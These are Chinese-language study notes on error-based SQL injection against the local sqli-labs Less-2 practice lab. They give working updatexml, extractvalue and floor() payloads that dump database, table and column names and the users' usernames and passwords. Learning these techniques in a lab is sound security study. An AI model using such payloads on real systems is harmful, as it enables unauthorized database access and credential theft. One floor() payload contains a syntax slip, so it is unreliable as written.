报错注入流程:
1.判断是否存在注入点
2.构造错误的语法制造报错
3.使用报错函数:updatexml,extractvalue,floor(),exp()等。
sql报错注入:extractvalue、updatexml报错原理:
转载于:https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html?spm=a2c4e.10696291.0.0.4a3c19a4xQumaw
十种报错注入的方法:
转载于:https://www.cnblogs.com/wocalieshenmegui/p/5917967.html
updatexml:update可更新的,xml可扩展标记语言;
描述:返回替换的XML片段
具有查询功能的函数,用于查询
payload:
updatexml: (xml_document,Xpathstring,new_value)
爆数据库名:
updatexml
0x3a是为了在xpath中是语法错误的
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x3a,database(),0x3a),1) --+
爆表名:
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ ),0x7e),1) --+
爆字段名:
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),0x7e),1) --+
爆数据:
http://127.0.0.1/sqli/Less-2/?id=1 and updatexml(1,concat(0x7e,(select group_concat(id,0x7e,username,0x7e,password) from security.users),0x7e),1) --+
extractvalue:
描述:使用xpath表示法从XML字符串中提取值
xml_docment:xml标记
Xpthstring: 显示输入语句
new_value:新值
爆数据库名:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat(database())))
爆表名:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat((select group_concat(table_name) from information_schema.tables where table_schema=‘security’))))
爆字段名:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,concat((select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’))))
爆数据:
http://127.0.0.1/sqli/Less-2/?id=1 and extractvalue(1,concat(0x7e,(select group_concat(id,0x7e,username,0x7e,password) from security.users)))
floor()报错注入:
https://www.cnblogs.com/litlife/p/8472323.html floor的讲解!
准确地说应该是floor,count,group by冲突报错
爆数据库名:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from(select count(*),concat(database(),0x7e,floor(rand(0)*2))x from information_schema.tables group by x) a)
爆表名:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*),concat(’~’,(select table_name from information_schema.tables where table_schema=‘security’ limit 3,1),’~’,floor(rand(0)*2)) as a from information_schema.tables group by a)b) --+
爆字段名:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*),concat(’~’,(select column_name from information_schema.columns where table_schema=‘security’ limit 5,1),’~’,floor(rand(0)*2)) as a from information_schema.tables group by a)b) --+
爆数据:
http://127.0.0.1/sqli/Less-2/?id=1 and (select 1 from (select count(*) ,concat(’~’(select concat(username,";",password,";")from security.users limit 5,1),floor(rand(0)*2))x from security.users group by x)a)
如果显示不完整:
substring(database(),5,10)
*Substring是字符截取函数,*
*String是字符串*
*从string里面第五个字符开始截取十个字符*